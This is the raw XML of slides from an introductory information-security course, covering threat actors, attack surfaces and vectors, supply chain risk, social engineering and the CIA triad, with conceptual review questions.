            <a:ext cx="3750733" cy="2510106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286722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0A0A3-2F2A-F97B-5432-5E94CEDF2320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nation-State Actors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D687849D-31CF-CC7B-A101-810579511EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="2108200"/>
            <a:ext cx="10452100" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1549296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AB4AC-9EC2-C456-7D3B-AE991BD02B50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REVIEW ACTIVITY: Threat actors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3689E410-D548-F431-1FBB-4D2B8DC58C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which of the following would be assessed by likelihood and impact: vulnerability, threat, or risk?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? Nation-state actors only pose a risk to other states.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You receive an email with a screenshot showing a command prompt at one of your application servers. The email suggests you engage the hacker for a day’s consultancy to patch the vulnerability. How should you categorize this threat?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which type of threat actor is primarily motivated by the desire for political change?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which three types of threat actor are most likely to have high levels of funding?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2850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54763-48A4-65B8-2CFC-3C614ADE98CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="618517"/>
            <a:ext cx="10364451" cy="1108683"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TOPIC 2B - Attack Surfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A81867-F03B-255F-BC6D-A693CED56E55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="1587500"/>
            <a:ext cx="8597900" cy="5085841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3730185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DF817-7043-7141-2395-B3E97C8416ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network Vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF6D937-63D1-1E18-5CC9-C257FD4797AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wired Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote and Wireless Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bluetooth Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open service port</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536177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4405-8012-8268-31E6-FC7CFDC69DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lure-Based Vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F58CEE17-6A00-964C-1C09-B1BE7BB198DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Removable Device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Document Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3463349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EAD91-C32A-6524-7D87-EDE05BFDB7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Message-Based Vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD82131-6A4A-5921-F514-52432210BD5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Short Message Service (SMS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Instant Messaging (IM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Web and Social Media</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112895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3F040-4C0C-2A58-0056-2B3DBD8F8170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Supply Chain Attack Surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E95FEFCA-2DA4-00B8-CCA7-F6D9AA311B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supplier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Business Partner</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2281886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5FAC5-846B-B12F-F5FB-BE7341CF157A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REVIEW ACTIVITY: ATTACK SURFACES</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1591DB3A-ABD8-EB1D-897F-416D9E11EF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A company uses stock photos from a site distributing copyright- free media to illustrate its websites and internal presentations. Subsequently, one of the company’s computers is found infected with malware that was downloaded by code embedded in the headers of a photo file obtained from the site. What threat vector(s) does this attack use?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A company’s systems are disrupted by a ransomware attack launched via a vulnerability in a network monitoring tool used by the company’s outsourced IT management. Aside from a software vulnerability, what part of the company’s attack surface has been used as a threat vector?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A company uses cell phones to provide IT support to its remote employees, but it does not maintain an authoritative directory of contact numbers for support staff. Risks from which specific threat vector are substantially increased by this oversight?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1468227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5D26F-C1BB-E5AF-BF6C-D87A317CDA65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 2C - Social Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86342CB-1140-3972-729C-308EFBBD8136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005290" y="2016124"/>
            <a:ext cx="10084230" cy="4037357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2773721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F7549-F30E-B921-97A5-A1FEE91E9305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TOPIC 1A – SECURITY CONCEPT</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1"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37D5A42D-069B-E0F9-3C06-DE816D958C5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Information security (infosec) refers to the protection of data resources from unauthorized access, attack, theft, or damage. Data may be vulnerable because of the way it is stored, transferred, or processed. The systems used to store, transmit, and process data must demonstrate the properties of security. Secure information has three properties, often referred to as the CIA Triad:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Confidentiality means that information can only be read by people who have been explicitly authorized to access it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Integrity means that the data is stored and transferred as intended and that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>any modification is authorized.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Availability means that information is readily accessible to those authorized to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>view or modify it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264617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0242-1E8B-CFAF-3583-B49F2AE4ED0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Phishing and Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4982E68D-D298-B27E-2BFC-30BCDF19C2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="2016124"/>
            <a:ext cx="9784853" cy="4417433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464893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995D-8799-7422-6544-80714F3234F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Business Email Compromise</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
